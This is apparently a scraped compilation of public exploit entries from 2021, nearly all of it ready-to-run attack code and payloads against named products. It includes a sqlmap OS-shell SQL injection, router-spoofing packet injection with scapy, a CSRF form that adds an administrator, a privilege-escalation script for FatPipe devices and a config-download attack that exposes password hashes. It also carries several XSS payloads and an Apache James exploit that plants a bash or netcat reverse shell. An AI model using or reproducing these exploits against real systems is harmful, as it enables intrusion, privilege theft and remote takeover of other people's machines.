ISHACK AI BOT

# Exploit Title: Library System 1.0 - 'student_id' SQL injection (Authenticated) # Google Dork: intitle: "Library System by YahooBaba" # Date: 26/08/2021 # Exploit Author: Vinay Bhuria # Vendor Homepage: https://www.yahoobaba.net # Software Link: https://www.yahoobaba.net/project/library-system-in-php # Version: v1.0 # Tested on: Windows Description: The Library System 1.0 application from Yahoobaba is vulnerable to SQL injection via the 'student_id' parameter on the student.php page. ==================== 1. SQLi ==================== http://localhost:8081/library-system/student.php The "student_id" parameter is vulnerable to SQL injection, it was also tested, and an authenticated user has the full ability to run system commands via --os-shell and fully compromise the system POST parameter 'student_id' is vulnerable. step 1 : Navigate to the "Reg student >> View" & capture the request in the proxy tool. step 2 : Now copy the post request and save it as test.txt file. step 3 : Run the sqlmap command "sqlmap -r test.txt -p student_id --os-shell" ---------------------------------------------------------------------- Parameter: student_id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: student_id=14 AND 9655=9655 Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: student_id=14 OR (SELECT 5735 FROM(SELECT COUNT(*),CONCAT(0x7170717871,(SELECT (ELT(5735=5735,1))),0x716a787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: student_id=14 AND (SELECT 2937 FROM (SELECT(SLEEP(5)))UeMT) Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: student_id=14 UNION ALL SELECT NULL,NULL,CONCAT(0x7170717871,0x64697648614c6b48736a5a72484e52794d4764507670436659596379577748794a4878747162596c,0x716a787871),NULL,NULL,NULL,NULL,NULL-- - [14:03:50] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/' - http://localhost:8081/tmpbctla.php [14:03:50] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER os-shell> whoami do you want to retrieve the command standard output? [Y/n/a] y command standard output: 'desktop-Vinay\vinay'

# Exploit Title: Cisco small business RV130W 1.0.3.44 - Inject Counterfeit Routers # Date: 24/09/2021 # Exploit Author: Michael Alamoot # Vendor Homepage: https://www.cisco.com/ # Version: RV130W 1.0.3.44 # Tested on: Kali linux #! /usr/bin/env python3 from scapy.contrib.eigrp import EIGRPAuthData from scapy.contrib.eigrp import EIGRPIntRoute from scapy.contrib.eigrp import EIGRPGeneric from scapy.contrib.eigrp import EIGRPSeq from scapy.contrib.eigrp import EIGRP from scapy.layers.vrrp import VRRPv3 from scapy.layers.vrrp import VRRP from scapy.layers.l2 import Ether from scapy.layers.inet import IP from scapy.sendrecv import sendp from scapy.volatile import RandMAC from scapy.all import conf import socket,networkx,os import argparse,sys,asyncio class argX: def __init__(self): self.parser = argparse.ArgumentParser(description="...") self.parser.add_argument( "-i","--ip", help="ip router fake injection", dest="ip", ) self.parser.add_argument( "-r","--ip-router", help="ip router root", dest="router", default=conf.route.route('0.0.0.0')[2] ) def argvX(self): """ [0] ip-router [1] ip-fake """ args = self.parser.parse_args() ip = args.ip route = args.router return [ip,route] class exploit(object): def __new__(cls,*args,**kwargs): return super(exploit,cls).__new__(cls) def __init__(self,IProuter,InjectFackeRouter): self.IProuter = IProuter self.InjectFackeRouter = InjectFackeRouter self.MAC = RandMAC() def pyload(self): pyload = Ether()/IP(src=self.IProuter,dst="224.0.0.18")\ /VRRPv3(version=3,type=1,vrid=1,priority=100,res=0,adv=100,addrlist=self.InjectFackeRouter)\ /IP(src=self.IProuter,dst="224.0.0.10") \ /EIGRP(opcode="Update",asn=100,seq=0,ack=0 ,tlvlist=[EIGRPIntRoute(dst=self.InjectFackeRouter,nexthop=self.IProuter)]) return pyload def start(self,count=[0,100]): for i in range(count[0],count[1]): sendp(self.pyload(),verbose=0,return_packets=False,inter=0,loop=0) print(f"\033[41m PACKET \033[0m Injection fake routers {self.IProuter} {self.InjectFackeRouter} \033[31m{i}\033[0m") if __name__ == "__main__": a = argX().argvX() if a[0]: net1 = exploit(IProuter=a[1],InjectFackeRouter=a[0]) net1.start() else: print("[-h] [--help]")

# Exploit Title: Cyberfox Web Browser 52.9.1 - Denial of Service (PoC) # Date: 2021-09-26 # Exploit Author: Aryan Chehreghani # Vendor Homepage: https://cyberfox.8pecxstudios.com # Software Link: https://www.techspot.com/downloads/6568-cyberfox-web-browser.html # Version: v52.9.1 (Possibly all versions) # Tested on: windows #[ About - Cyberfox ] : #Cyberfox is a Mozilla-based Internet browser designed to take advantage of 64-bit architecture #but a 32-bit version is also available.The application provides a higher memory performance when navigating your favorite pages. # [ Exploit/POC ] : # 1.Run the python script, it will create a new file "output.txt" # 2.Run Cyberfox Web Browser # 3.Copy the content of the file "output.txt" & Paste into the "search bar" # 4.Crashed Overflow = "\x41" * 9000000 try: f=open("output.txt","w") print("[!] Creating %s bytes DOS payload...." %len(Overflow)) f.write(Overflow) f.close() print("[!] File Created !") except: print("File cannot be created")

# Exploit Title: XAMPP 7.4.3 - Local Privilege Escalation # Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker # Original Author: Maximilian Barz (@S1lkys) # Date: 27/09/2021 # Vendor Homepage: https://www.apachefriends.org # Version: XAMPP < 7.2.29, 7.3.x < 7.3.16 & 7.4.x < 7.4.4 # Tested on: Windows 10 + XAMPP 7.3.10 # References: https://github.com/S1lkys/CVE-2020-11107 $file = "C:\xampp\xampp-control.ini" $find = ((Get-Content $file)[2] -Split "=")[1] # Insert your payload path here $replace = "C:\temp\msf.exe" (Get-Content $file) -replace $find, $replace | Set-Content $file

# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF) # Date: 25.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.fatpipeinc.com <!-- FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 CSRF Add Admin Exploit Vendor: FatPipe Networks Inc. Product web page: https://www.fatpipeinc.com Affected version: WARP / IPVPN / MPVPN 10.2.2r38 10.2.2r25 10.2.2r10 10.1.2r60p82 10.1.2r60p71 10.1.2r60p65 10.1.2r60p58s1 10.1.2r60p58 10.1.2r60p55 10.1.2r60p45 10.1.2r60p35 10.1.2r60p32 10.1.2r60p13 10.1.2r60p10 9.1.2r185 9.1.2r180p2 9.1.2r165 9.1.2r164p5 9.1.2r164p4 9.1.2r164 9.1.2r161p26 9.1.2r161p20 9.1.2r161p17 9.1.2r161p16 9.1.2r161p12 9.1.2r161p3 9.1.2r161p2 9.1.2r156 9.1.2r150 9.1.2r144 9.1.2r129 7.1.2r39 6.1.2r70p75-m 6.1.2r70p45-m 6.1.2r70p26 5.2.0r34 Summary: FatPipe Networks invented the concept of router-clustering, which provides the highest level of reliability, redundancy, and speed of Internet traffic for Business Continuity and communications. FatPipe WARP achieves fault tolerance for companies by creating an easy method of combining two or more Internet connections of any kind over multiple ISPs. FatPipe utilizes all paths when the lines are up and running, dynamically balancing traffic over the multiple lines, and intelligently failing over inbound and outbound IP traffic when ISP services and/or components fail. FatPipe IPVPN balances load and provides reliability among multiple managed and CPE based VPNs as well as dedicated private networks. FatPipe IPVPN can also provide you an easy low-cost migration path from private line, Frame or Point-to-Point networks. You can aggregate multiple private, MPLS and public networks without additional equipment at the provider's site. FatPipe MPVPN, a patented router clustering device, is an essential part of Disaster Recovery and Business Continuity Planning for Virtual Private Network (VPN) connectivity. It makes any VPN up to 900% more secure and 300% times more reliable, redundant and faster. MPVPN can take WANs with an uptime of 99.5% or less and make them 99.999988% or higher, providing a virtually infallible WAN. MPVPN dynamically balances load over multiple lines and ISPs without the need for BGP programming. MPVPN aggregates up to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed you need to keep your VPN up and running despite failures of service, line, software, or hardware. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: Apache-Coyote/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5681 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5681.php 30.05.2016 25.07.2021 --> <html> <body> <form action="https://10.0.0.7/fpui/userServlet?loadType=set&block=userSetRequest" method="POST"> <input type="hidden" name="userList" value='[{"userName":"adminz","privilege":"1","password":"TestPwd17","action":"add","state":false}]' /> <input type="submit" value="Submit" /> </form> </body> </html>

# Exploit Title: FatPipe Networks WARP 10.2.2 - Authorization Bypass # Date: 25.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.fatpipeinc.com FatPipe Networks WARP 10.2.2 Authorization Bypass Vendor: FatPipe Networks Inc. Product web page: https://www.fatpipeinc.com Affected version: WARP 10.2.2r38 10.2.2r25 10.2.2r10 10.1.2r60p82 10.1.2r60p71 10.1.2r60p65 10.1.2r60p58s1 10.1.2r60p58 10.1.2r60p55 10.1.2r60p45 10.1.2r60p35 10.1.2r60p32 10.1.2r60p13 10.1.2r60p10 9.1.2r185 9.1.2r180p2 9.1.2r165 9.1.2r164p5 9.1.2r164p4 9.1.2r164 9.1.2r161p26 9.1.2r161p20 9.1.2r161p17 9.1.2r161p16 9.1.2r161p12 9.1.2r161p3 9.1.2r161p2 9.1.2r156 9.1.2r150 9.1.2r144 9.1.2r129 7.1.2r39 6.1.2r70p75-m 6.1.2r70p45-m 6.1.2r70p26 5.2.0r34 Summary: FatPipe Networks invented the concept of router-clustering, which provides the highest level of reliability, redundancy, and speed of Internet traffic for Business Continuity and communications. FatPipe WARP achieves fault tolerance for companies by creating an easy method of combining two or more Internet connections of any kind over multiple ISPs. FatPipe utilizes all paths when the lines are up and running, dynamically balancing traffic over the multiple lines, and intelligently failing over inbound and outbound IP traffic when ISP services and/or components fail. Desc: Improper access control occurs when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources behind protected pages. Tested on: Apache-Coyote/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5682 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5682.php 30.05.2016 25.07.2021 -- $ curl -vk "https://10.0.0.9/fpui/jsp/index.jsp"

# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access) # Date: 25.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.fatpipeinc.com FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Hidden Backdoor Account (Write Access) Vendor: FatPipe Networks Inc. Product web page: https://www.fatpipeinc.com Affected version: WARP / IPVPN / MPVPN 10.2.2r38 10.2.2r25 10.2.2r10 10.1.2r60p82 10.1.2r60p71 10.1.2r60p65 10.1.2r60p58s1 10.1.2r60p58 10.1.2r60p55 10.1.2r60p45 10.1.2r60p35 10.1.2r60p32 10.1.2r60p13 10.1.2r60p10 9.1.2r185 9.1.2r180p2 9.1.2r165 9.1.2r164p5 9.1.2r164p4 9.1.2r164 9.1.2r161p26 9.1.2r161p20 9.1.2r161p17 9.1.2r161p16 9.1.2r161p12 9.1.2r161p3 9.1.2r161p2 9.1.2r156 9.1.2r150 9.1.2r144 9.1.2r129 7.1.2r39 6.1.2r70p75-m 6.1.2r70p45-m 6.1.2r70p26 5.2.0r34 Summary: FatPipe Networks invented the concept of router-clustering, which provides the highest level of reliability, redundancy, and speed of Internet traffic for Business Continuity and communications. FatPipe WARP achieves fault tolerance for companies by creating an easy method of combining two or more Internet connections of any kind over multiple ISPs. FatPipe utilizes all paths when the lines are up and running, dynamically balancing traffic over the multiple lines, and intelligently failing over inbound and outbound IP traffic when ISP services and/or components fail. FatPipe IPVPN balances load and provides reliability among multiple managed and CPE based VPNs as well as dedicated private networks. FatPipe IPVPN can also provide you an easy low-cost migration path from private line, Frame or Point-to-Point networks. You can aggregate multiple private, MPLS and public networks without additional equipment at the provider's site. FatPipe MPVPN, a patented router clustering device, is an essential part of Disaster Recovery and Business Continuity Planning for Virtual Private Network (VPN) connectivity. It makes any VPN up to 900% more secure and 300% times more reliable, redundant and faster. MPVPN can take WANs with an uptime of 99.5% or less and make them 99.999988% or higher, providing a virtually infallible WAN. MPVPN dynamically balances load over multiple lines and ISPs without the need for BGP programming. MPVPN aggregates up to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed you need to keep your VPN up and running despite failures of service, line, software, or hardware. Desc: The application has a hidden administrative account 'cmuser' that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application. Tested on: Apache-Coyote/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5684 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php 30.05.2016 25.07.2021 -- Overview: FatPipe Central Manager is a secure web based solution providing a centralized solution to manage FatPipe's suite of WAN reliability and optimization products. Central Manager allows you to configure, manage and monitor FatPipe's patented MPSec technology at the click of a button. Central Manager = cmuser. Once authenticated, you get admin rights. HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Strict-Transport-Security: max-age=31536000 X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Content-Type: application/json;charset=ISO-8859-1 Content-Length: 118 Date: Fri, 06 Aug 2017 16:37:07 GMT Connection: close {"loginRes":"success","userName":"userName","userAccess":"writeAccess","activeUserName":"cmuser","message":"noError"}

# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated) # Date: 25.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.fatpipeinc.com FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Unauthenticated Config Download Vendor: FatPipe Networks Inc. Product web page: https://www.fatpipeinc.com Affected version: WARP / IPVPN / MPVPN 10.2.2r38 10.2.2r25 10.2.2r10 10.1.2r60p82 10.1.2r60p71 10.1.2r60p65 10.1.2r60p58s1 10.1.2r60p58 10.1.2r60p55 10.1.2r60p45 10.1.2r60p35 10.1.2r60p32 10.1.2r60p13 10.1.2r60p10 9.1.2r185 9.1.2r180p2 9.1.2r165 9.1.2r164p5 9.1.2r164p4 9.1.2r164 9.1.2r161p26 9.1.2r161p20 9.1.2r161p17 9.1.2r161p16 9.1.2r161p12 9.1.2r161p3 9.1.2r161p2 9.1.2r156 9.1.2r150 9.1.2r144 9.1.2r129 7.1.2r39 6.1.2r70p75-m 6.1.2r70p45-m 6.1.2r70p26 5.2.0r34 Summary: FatPipe Networks invented the concept of router-clustering, which provides the highest level of reliability, redundancy, and speed of Internet traffic for Business Continuity and communications. FatPipe WARP achieves fault tolerance for companies by creating an easy method of combining two or more Internet connections of any kind over multiple ISPs. FatPipe utilizes all paths when the lines are up and running, dynamically balancing traffic over the multiple lines, and intelligently failing over inbound and outbound IP traffic when ISP services and/or components fail. FatPipe IPVPN balances load and provides reliability among multiple managed and CPE based VPNs as well as dedicated private networks. FatPipe IPVPN can also provide you an easy low-cost migration path from private line, Frame or Point-to-Point networks. You can aggregate multiple private, MPLS and public networks without additional equipment at the provider's site. FatPipe MPVPN, a patented router clustering device, is an essential part of Disaster Recovery and Business Continuity Planning for Virtual Private Network (VPN) connectivity. It makes any VPN up to 900% more secure and 300% times more reliable, redundant and faster. MPVPN can take WANs with an uptime of 99.5% or less and make them 99.999988% or higher, providing a virtually infallible WAN. MPVPN dynamically balances load over multiple lines and ISPs without the need for BGP programming. MPVPN aggregates up to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed you need to keep your VPN up and running despite failures of service, line, software, or hardware. Desc: The application is vulnerable to unauthenticated configuration disclosure when direct object reference is made to the backup archive file using an HTTP GET request. The only unknown part of the filename is the hostname of the system. This will enable the attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and full system access. Tested on: Apache-Coyote/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5683 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5683.php 30.05.2016 25.07.2021 -- Products: --------- WARP / MPVPN / IPVPN Format: ------- https://[TARGET]/fpui/[HostName]-config-[Product]-[Version]-mcore.tar.gz Examples: --------- curl -sk https://10.0.0.7/fpui/ZSLAB-config-WARP-9.1.2r161p19-mcore.tar.gz # For WARP curl -sk https://10.0.0.8/fpui/testingus-config-VPN-10.2.2r38-mcore.tar.gz # For MPVPN/IPVPN Version: -------- $ curl -sk https://10.0.0.9/fpui/jsp/login.jsp |findstr /spina:d "10.2" 103: <h5>10.2.2r38</h5> Product: -------- $ curl -sk https://10.0.0.9/fpui/jsp/login.jsp |findstr /spina:d "FatPipe" 15: <title>FatPipe MPVPN&nbsp;| Log in</title> Content: -------- $ tar -xf testingus-config-VPN-10.2.2r38-mcore.tar.gz $ cd etc $ cat Xpasswd Administrator:26df420bcb78bb02eef532d51aea22e2:1 fatpipe:3b5afbb47fc3067d62d73f5bb1f92b5b:1 $ ls . .. auto_config.conf bird.conf bridge.conf cm.conf crontab dhcpd.conf dnssec.conf dynamic_route.conf fatpipe fileserver.conf fp_arp.conf fp_config.dtd fp_distributed_global_rule fp_global_rule fp_version haproxy hosts interface_access_list.conf ipsec.conf ipsec.d ipsec.secrets ipsec_cert_secrets ipsec_shared_secrets ipsec_subnet.conf ipsec_xauth.conf ipv4_dynamic_routing.conf logrotate.d manifest named.conf network_object.conf ntp.conf ppp radiusclient resolv.conf rsyslog.conf site.xml site.xml.org snmp_config.conf squid sysconfig syslog.conf tcp-congestion-table.conf tcp-congestion-table.conf.org webfilter.conf xgreet.txt xnetmap.conf Xpasswd xsnmp.conf xtreme_conf.xml

# Exploit Title: WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 06-08-2021 # Exploit Author: Nosa Shandy (Apapedulimu) # Vendor Homepage: https://translatepress.com/ # Software Link: https://wordpress.org/plugins/translatepress-multilingual/ # Reference: https://wpscan.com/vulnerability/b87fcc2f-c2eb-4e23-9757-d1c590f26d3f # Version: 2.0.6 # Tested on: macOS 11.4 # CVE : CVE-2021-24610 Description: The plugin does not implement a proper filter on the 'translated' parameter when input to the database. The 'trp_sanitize_string' function only check the "<script></script>" with the preg_replace, the attacker can use the HTML Tag to execute javascript. Step To Reproduce: 1. Go to http://localhost:8888/wordpress/?trp-edit-translation=true 2. Input Gettext String 3. Input the payload such as <img src=x onerror=alert(4)> 4. Save, The payload will be executed. 5. Look on the homepage will be affected. Video : https://drive.google.com/file/d/1PnvjHuKCvjmom6xz_sxNLBu3jixCiHy_/view?usp=sharing

# Exploit Title: FatPipe Networks MPVPN 10.2.2 - Remote Privilege Escalation # Date: 25.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.fatpipeinc.com #!/usr/bin/env python3 # # # FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation # # # Vendor: FatPipe Networks Inc. # Product web page: https://www.fatpipeinc.com # Affected version: WARP / IPVPN / MPVPN # 10.2.2r38 # 10.2.2r25 # 10.2.2r10 # 10.1.2r60p82 # 10.1.2r60p71 # 10.1.2r60p65 # 10.1.2r60p58s1 # 10.1.2r60p58 # 10.1.2r60p55 # 10.1.2r60p45 # 10.1.2r60p35 # 10.1.2r60p32 # 10.1.2r60p13 # 10.1.2r60p10 # 9.1.2r185 # 9.1.2r180p2 # 9.1.2r165 # 9.1.2r164p5 # 9.1.2r164p4 # 9.1.2r164 # 9.1.2r161p26 # 9.1.2r161p20 # 9.1.2r161p17 # 9.1.2r161p16 # 9.1.2r161p12 # 9.1.2r161p3 # 9.1.2r161p2 # 9.1.2r156 # 9.1.2r150 # 9.1.2r144 # 9.1.2r129 # 7.1.2r39 # 6.1.2r70p75-m # 6.1.2r70p45-m # 6.1.2r70p26 # 5.2.0r34 # # Summary: FatPipe Networks invented the concept of router-clustering, # which provides the highest level of reliability, redundancy, and speed # of Internet traffic for Business Continuity and communications. FatPipe # WARP achieves fault tolerance for companies by creating an easy method # of combining two or more Internet connections of any kind over multiple # ISPs. FatPipe utilizes all paths when the lines are up and running, # dynamically balancing traffic over the multiple lines, and intelligently # failing over inbound and outbound IP traffic when ISP services and/or # components fail. # # FatPipe IPVPN balances load and provides reliability among multiple # managed and CPE based VPNs as well as dedicated private networks. FatPipe # IPVPN can also provide you an easy low-cost migration path from private # line, Frame or Point-to-Point networks. You can aggregate multiple private, # MPLS and public networks without additional equipment at the provider's # site. # # FatPipe MPVPN, a patented router clustering device, is an essential part # of Disaster Recovery and Business Continuity Planning for Virtual Private # Network (VPN) connectivity. It makes any VPN up to 900% more secure and # 300% times more reliable, redundant and faster. MPVPN can take WANs with # an uptime of 99.5% or less and make them 99.999988% or higher, providing # a virtually infallible WAN. MPVPN dynamically balances load over multiple # lines and ISPs without the need for BGP programming. MPVPN aggregates up # to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed # you need to keep your VPN up and running despite failures of service, line, # software, or hardware. # # Desc: The application suffers from a privilege escalation vulnerability. # A normal user (group USER, 0) can elevate her privileges by sending a HTTP # POST request and setting the JSON parameter 'privilege' to integer value # '1' gaining administrative rights (group ADMINISTRATOR, 1). # # Tested on: Apache-Coyote/1.1 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2021-5685 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5685.php # # # 30.05.2016 # 25.07.2021 # # import sys import time####### import requests################ requests.packages.urllib3.disable_warnings() if len(sys.argv) !=2: print print("********************************************************") print("* *") print("* Privilege escalation from USER to ADMINISTRATOR role *") print("* in *") print("* FatPipe WARP/IPVPN/MPVPN v10.2.2 *") print("* *") print("* ZSL-2021-5685 *") print("* *") print("********************************************************") print("\n[POR] Usage: ./escalator.py [IP]") sys.exit() ajpi=sys.argv[1] print juzer=raw_input("[UNE] Username: ") pasvord=raw_input("[UNE] Password: ") sesija=requests.session() logiranje={'loginParams':'{\"username\":\"'+juzer+'\",\"password\":\"'+pasvord+'\",\"authType\":0}'} hederi={'Sec-Ch-Ua' :'\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"92\"', 'Accept' :'application/json, text/javascript, */*; q=0.01', 'X-Requested-With':'XMLHttpRequest', 'Sec-Ch-Ua-Mobile':'?0', 'User-Agent' :'Fatnet/1.b', 'Content-Type' :'application/x-www-form-urlencoded; charset=UTF-8', 'Origin' :'https://'+ajpi, 'Sec-Fetch-Site' :'same-origin', 'Sec-Fetch-Mode' :'cors', 'Sec-Fetch-Dest' :'empty', 'Referer' :'https://'+ajpi+'/fpui/dataCollectionServlet', 'Accept-Encoding' :'gzip, deflate', 'Accept-Language' :'en-US,en;q=0.9', 'Connection' :'close'} juarel1='https://'+ajpi+'/fpui/loginServlet' alo=sesija.post(juarel1,headers=hederi,data=logiranje,verify=False) if not 'success' in alo.text: print('[GRE] Login error.') sys.exit() else: print('[POR] Authentication successful.') print('[POR] Climbing the ladder...') sluba=''' || || .--._ ||====|| __ '---._) || ||"")\ Q Q ) ||====|| =_/ o / || || | \_.-;-'-,._ ||====|| | ' o---o ) || || \ /H __H\ / ||====|| '-' \"")\/ | || || _ |_='-)_/ ||====|| / '. ) || || / / ||====|| |___/\| / || || |_| | | ||====|| / ) \\ \\ || || (__/ \___\\ ||====|| \_\\ || || / ) ||====|| (__/ ''' for k in sluba: sys.stdout.write(k) sys.stdout.flush() time.sleep(0.01) juarel2='https://'+ajpi+'/fpui/userServlet?loadType=set&block=userSetRequest' posta={ 'userList':'[{\"userName\":\"'+juzer+'\",\"oldUserName\":\"'+juzer+'\",\"privilege\":\"1\",\"password\":\"'+pasvord+'\",\"action\":\"edit\",\"state\":false}]' } stanje=sesija.post(juarel2,headers=hederi,data=posta,verify=False) if not 'true' in stanje.text: print('\n[GRE] Something\'s fishy!') sys.exit() else: print('\n[POR] You are now authorized not only to view settings, but to modify them as well. Yes indeed.') sys.exit()

# Exploit Title: WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS) # Date: 3/28/2021 # Author: 0xB9 # Software Link: https://wordpress.org/plugins/contact-form-by-supsystic/ # Version: 1.7.14 # Tested on: Windows 10 # CVE: CVE-2021-24276 1. Description: The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue 2. Proof of Concept: /wp-admin/admin.php?page=contact-form-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//

# Exploit Title: WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS) # Date: 3/28/2021 # Author: 0xB9 # Software Link: https://wordpress.org/plugins/ultimate-maps-by-supsystic/ # Version: 1.2.4 # Tested on: Windows 10 # CVE: CVE-2021-24274 1. Description: The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue 2. Proof of Concept: /wp-admin/admin.php?page=ultimate-maps-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//

# Exploit Title: WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS) # Date: 3/28/2021 # Author: 0xB9 # Software Link: https://wordpress.org/plugins/popup-by-supsystic/ # Version: 1.10.4 # Tested on: Windows 10 # CVE: CVE-2021-24275 1. Description: The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue 2. Proof of Concept: /wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//

# Exploit Title: Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2) # Date: 27/09/2021 # Exploit Author: shinris3n # Vendor Homepage: http://james.apache.org/server/ # Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip # Version: Apache James Server 2.3.2 # Tested on: Ubuntu # Info: This exploit works on default installation of Apache James Server 2.3.2 # Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d ''' This Python 3 implementation is based on the original (Python 2) exploit code developed by Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec. The following modifications were made: 1 - Made required changes to print and socket commands for Python 3 compatibility. 1 - Changed the default payload to a basic bash reverse shell script and added a netcat option. 2 - Changed the command line syntax to allow user input of remote ip, local ip and listener port to correspond with #2. 3 - Added a payload that can be used for testing remote command execution and connectivity. 4 - Added payload and listener information output based on payload selection and user input. 5 - Added execution output clarifications and additional informational comments throughout the code. @shinris3n https://twitter.com/shinris3n https://shinris3n.github.io/ ''' #!/usr/bin/python3 import socket import sys import time # credentials to James Remote Administration Tool (Default - root/root) user = 'root' pwd = 'root' if len(sys.argv) != 4: sys.stderr.write("[-]Usage: python3 %s <remote ip> <local ip> <local listener port>\n" % sys.argv[0]) sys.stderr.write("[-]Example: python3 %s 172.16.1.66 172.16.1.139 443\n" % sys.argv[0]) sys.stderr.write("[-]Note: The default payload is a basic bash reverse shell - check script for details and other options.\n") sys.exit(1) remote_ip = sys.argv[1] local_ip = sys.argv[2] port = sys.argv[3] # Select payload prior to running script - default is a reverse shell executed upon any user logging in (i.e. via SSH) payload = '/bin/bash -i >& /dev/tcp/' + local_ip + '/' + port + ' 0>&1' # basic bash reverse shell exploit executes after user login #payload = 'nc -e /bin/sh ' + local_ip + ' ' + port # basic netcat reverse shell #payload = 'echo $USER && cat /etc/passwd && ping -c 4 ' + local_ip # test remote command execution capabilities and connectivity #payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # proof of concept exploit on root user login only print ("[+]Payload Selected (see script for more options): ", payload) if '/bin/bash' in payload: print ("[+]Example netcat listener syntax to use after successful execution: nc -lvnp", port) def recv(s): s.recv(1024) time.sleep(0.2) try: print ("[+]Connecting to James Remote Administration Tool...") s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((remote_ip,4555)) # Assumes James Remote Administration Tool is running on Port 4555, change if necessary. s.recv(1024) s.send((user + "\n").encode('utf-8')) s.recv(1024) s.send((pwd + "\n").encode('utf-8')) s.recv(1024) print ("[+]Creating user...") s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n".encode('utf-8')) s.recv(1024) s.send("quit\n".encode('utf-8')) s.close() print ("[+]Connecting to James SMTP server...") s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((remote_ip,25)) # Assumes default SMTP port, change if necessary. s.send("ehlo [email protected]\r\n".encode('utf-8')) recv(s) print ("[+]Sending payload...") s.send("mail from: <'@team.pl>\r\n".encode('utf-8')) recv(s) # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n".encode('utf-8')) if the recipient cannot be found s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n".encode('utf-8')) recv(s) s.send("data\r\n".encode('utf-8')) recv(s) s.send("From: [email protected]\r\n".encode('utf-8')) s.send("\r\n".encode('utf-8')) s.send("'\n".encode('utf-8')) s.send((payload + "\n").encode('utf-8')) s.send("\r\n.\r\n".encode('utf-8')) recv(s) s.send("quit\r\n".encode('utf-8')) recv(s) s.close() print ("[+]Done! Payload will be executed once somebody logs in (i.e. via SSH).") if '/bin/bash' in payload: print ("[+]Don't forget to start a listener on port", port, "before logging in!") except: print ("Connection failed.")

